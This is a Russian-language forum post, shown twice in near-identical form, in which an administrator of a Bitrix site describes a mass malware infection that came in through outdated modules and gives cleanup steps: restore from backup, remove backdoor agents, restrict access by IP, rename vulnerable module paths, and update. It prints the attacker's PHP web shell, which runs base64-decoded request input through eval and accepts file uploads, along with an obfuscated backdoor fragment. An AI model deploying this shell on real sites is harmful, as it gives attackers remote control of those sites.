Всем привет!
Сегодня обнаружили такую же проблему, с внедрением вредоносного кода и остановкой работоспособности сайта.
Вирус наплодил файлы .htaccess с содержимым:
а также файлы вида "2469a41bac71.php" с содержимым:
Судя по логам, атака началась еще 4 дня назад...
Внедрение пришло с не обновлённых модулей и компонентов, которые теперь придется обновлять всем, т.к. проблемка с вирусами массового характера...
Тем, у кого нет бекапов - сочувствую, т.к. вычищать придется очень много всего (только .htaccess у нас больше 1000, т.к. расплодились по всем разделам включая папку /upload/)
У нас хостинг Бегет, поэтому проблем с бекапами нет, спасибо бегету за это...
В общем, решение следующее:
0. Остановить работу сайта и сделать его недоступным (за нас это сделал хостер) - иначе файлы пересоздаются
1. Восстановить все файлы сайта из бекапа / вычищать все лишние файлы и папки, а также права (755 - папки, 644 - файлы)
2. Проверить и удалить бекдоры в агентах https://ваш-сайт/bitrix/admin/agent_list.php типа //_(9.)H'5t}>qo7ouj7<(>!)U}3/]6u8u}Q%' //>w7u5ST<"IA.xY:8eeval / Восстановить базу данных из бекапа - по возможности
3. Разрешить доступ к сайту со своего ip-адреса (1.2.3.4) в nginx либо в .htaccess:
до Apache 2.4:
c Apache 2.4:
4. Если не хочется или не можется выполнить п.3 - удаляем или переименовываем разделы модулей и файлы *.php:
- /bitrix/modules/vote/
- /bitrix/modules/ui/
- /bitrix/tools/vote/
- /bitrix/modules/fileman/
- /bitrix/modules/main/tools/uf.php
- /bitrix/modules/main/tools/upload.php
- /bitrix/modules/main/tools/composite_data.php
5. Вернуть работу сайта
6. Произвести обновление системы (перед обновлением можно восстановить удаленные/переименованные файлы, если был п.4)
7. Перейти на PHP 8.1 / 8.2 и радоваться еще какое-то время неуязвимости системы
А далее проверяем access и error логи - для отслеживания и блокировки атакуемых файлов или модулей.
Сегодня обнаружили такую же проблему, с внедрением вредоносного кода и остановкой работоспособности сайта.
Вирус наплодил файлы .htaccess с содержимым:
Код |
---|
<FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'> Order allow,deny Deny from all </FilesMatch> |
а также файлы вида "2469a41bac71.php" с содержимым:
Код |
---|
<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?> |
Судя по логам, атака началась еще 4 дня назад...
Внедрение пришло с не обновлённых модулей и компонентов, которые теперь придется обновлять всем, т.к. проблемка с вирусами массового характера...
Тем, у кого нет бекапов - сочувствую, т.к. вычищать придется очень много всего (только .htaccess у нас больше 1000, т.к. расплодились по всем разделам включая папку /upload/)
У нас хостинг Бегет, поэтому проблем с бекапами нет, спасибо бегету за это...
В общем, решение следующее:
0. Остановить работу сайта и сделать его недоступным (за нас это сделал хостер) - иначе файлы пересоздаются
1. Восстановить все файлы сайта из бекапа / вычищать все лишние файлы и папки, а также права (755 - папки, 644 - файлы)
2. Проверить и удалить бекдоры в агентах https://ваш-сайт/bitrix/admin/agent_list.php типа //_(9.)H'5t}>qo7ouj7<(>!)U}3/]6u8u}Q%' //>w7u5ST<"IA.xY:8eeval / Восстановить базу данных из бекапа - по возможности
3. Разрешить доступ к сайту со своего ip-адреса (1.2.3.4) в nginx либо в .htaccess:
до Apache 2.4:
Код |
---|
Deny from All Allow from 1.2.3.4 |
c Apache 2.4:
Код |
---|
Require all denied Require ip 1.2.3.4 |
4. Если не хочется или не можется выполнить п.3 - удаляем или переименовываем разделы модулей и файлы *.php:
- /bitrix/modules/vote/
- /bitrix/modules/ui/
- /bitrix/tools/vote/
- /bitrix/modules/fileman/
- /bitrix/modules/main/tools/uf.php
- /bitrix/modules/main/tools/upload.php
- /bitrix/modules/main/tools/composite_data.php
5. Вернуть работу сайта
6. Произвести обновление системы (перед обновлением можно восстановить удаленные/переименованные файлы, если был п.4)
7. Перейти на PHP 8.1 / 8.2 и радоваться еще какое-то время неуязвимости системы
А далее проверяем access и error логи - для отслеживания и блокировки атакуемых файлов или модулей.